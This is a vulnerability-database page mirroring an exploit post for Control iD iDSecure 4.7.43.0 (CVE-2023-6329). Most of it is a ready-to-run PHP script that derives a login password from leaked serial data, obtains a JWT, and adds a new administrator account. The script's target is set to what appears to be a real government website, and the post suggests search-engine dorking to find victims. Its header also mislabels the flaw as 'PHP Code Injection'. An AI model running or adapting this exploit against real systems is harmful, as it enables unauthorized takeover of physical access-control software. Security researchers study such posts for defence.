Lucene search
K

Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass

🗓️ 04 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 160 Views

Exploit allows adding an administrator without password using Control iD iDSecure 4.7.43.0 vulnerability.

Related
Code
=============================================================================================================================================
    | # Title     : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://profil.nunukankab.go.id/org/dkisp                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.
    	
    	( https://packetstorm.news/files/id/180858/  CVE-2023-6329)
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 114
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class ControlIDExploit {
        private $target;
        private $new_user;
        private $new_password;
    
        public function __construct($target, $new_user, $new_password) {
            $this->target = rtrim($target, '/'); // إزالة أي "/" زائدة في النهاية
            $this->new_user = $new_user;
            $this->new_password = $new_password;
        }
    
        private function send_request($method, $uri, $data = null, $headers = []) {
            $url = "{$this->target}{$uri}";
            $ch = curl_init($url);
    
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10); // مهلة الطلب 10 ثوانٍ
    
            if ($data) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
                $headers[] = 'Content-Type: application/json';
            }
    
            if (!empty($headers)) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            }
    
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $error = curl_error($ch);
            curl_close($ch);
    
            if ($error) {
                die(" Error connecting to $url: $error\n");
            }
    
            if ($http_code == 404) {
                die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
            }
    
            return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
        }
    
        public function exploit() {
            echo " Trying to get the raw data...\n";
            
            // 1) الحصول على serial و passwordRandom
            $response = $this->send_request('GET', '/api/login/unlockGetData');
            
            if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
                die("❌ Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            $password_random = $response['passwordRandom'];
            $serial = $response['serial'];
    
            echo " Retrieved passwordRandom: $password_random\n";
            echo " Retrieved serial: $serial\n";
    
            // 2) إنشاء passwordCustom
            $sha1_hash = sha1($serial);
            $combined_string = $sha1_hash . $password_random . 'cid2016';
            $sha256_hash = hash('sha256', $combined_string);
            $short_hash = substr($sha256_hash, 0, 6);
            $password_custom = hexdec($short_hash);
    
            echo " Created passwordCustom: $password_custom\n";
    
            // 3) تسجيل الدخول للحصول على JWT
            echo "Attempt to login...\n";
            $login_data = [
                'passwordCustom' => (string)$password_custom,
                'passwordRandom' => $password_random
            ];
    
            $response = $this->send_request('POST', '/api/login/', $login_data);
            if (!isset($response['accessToken'])) {
                die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            $access_token = $response['accessToken'];
            echo " Obtained JWT: $access_token\n";
    
            // 4) إضافة مستخدم إداري جديد
            echo " Trying to add a new user...\n";
            $user_data = [
                'idType' => '1',
                'name' => $this->new_user,
                'user' => $this->new_user,
                'newPassword' => $this->new_password,
                'password_confirmation' => $this->new_password
            ];
    
            $headers = [
                "Authorization: Bearer $access_token"
            ];
    
            $response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
            if (!isset($response['code']) || $response['code'] != 200) {
                die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
            }
    
            echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
        }
    }
    
    // 🔥 أدخل بيانات الاستهداف هنا
    $target_host = 'https://profil.nunukankab.go.id'; // استبدل بعنوان الموقع
    $new_admin_user = 'adminuser';
    $new_admin_password = 'securepassword';
    
    // تشغيل الكود
    $exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
    $exploit->exploit();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Mar 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.65237
160